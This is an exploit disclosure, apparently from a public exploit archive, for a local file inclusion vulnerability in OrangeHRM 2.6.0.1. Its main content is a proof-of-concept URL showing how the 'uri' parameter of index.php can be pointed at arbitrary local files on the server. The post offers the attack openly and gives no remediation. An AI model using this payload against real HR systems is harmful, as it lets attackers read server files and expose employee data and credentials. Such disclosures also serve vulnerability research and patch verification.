id: 14432
date: 10/12/2010
title: OrangeHRM 2.6.0.1 Local File Inclusion Vulnerability
author: ZonTa
cves: 

====================================================
OrangeHRM 2.6.0.1 Local File Inclusion Vulnerability
====================================================

# Exploit Title:    OrangeHRM 2.6.0.1 Local File Inclusion Vulnerability
# Date: 11-10-2010
# Author: ZonTa -[ LkHackerZ ]-
# Mail: zontahackers[at]gmail[dot]com
# Software Link:    http://www.orangehrm.com/product-download.php?type=stable-zip
                    http://sourceforge.net/projects/orangehrm/files/stable/2.6/orangehrm-2.6.0.1.zip/download
# Version: 2.6.0.1
# Tested on: Apache,PHP5
-------------------------------------------------------------------------------------------------------------------
 
POC
 
http://localhost/orangehrm/index.php?uniqcode=KPI&menu_no_top=performance&uri=[local-file]
 
---------------------------------------------------- END ----------------------------------------------------------



#  0day.today [2023-03-24]  #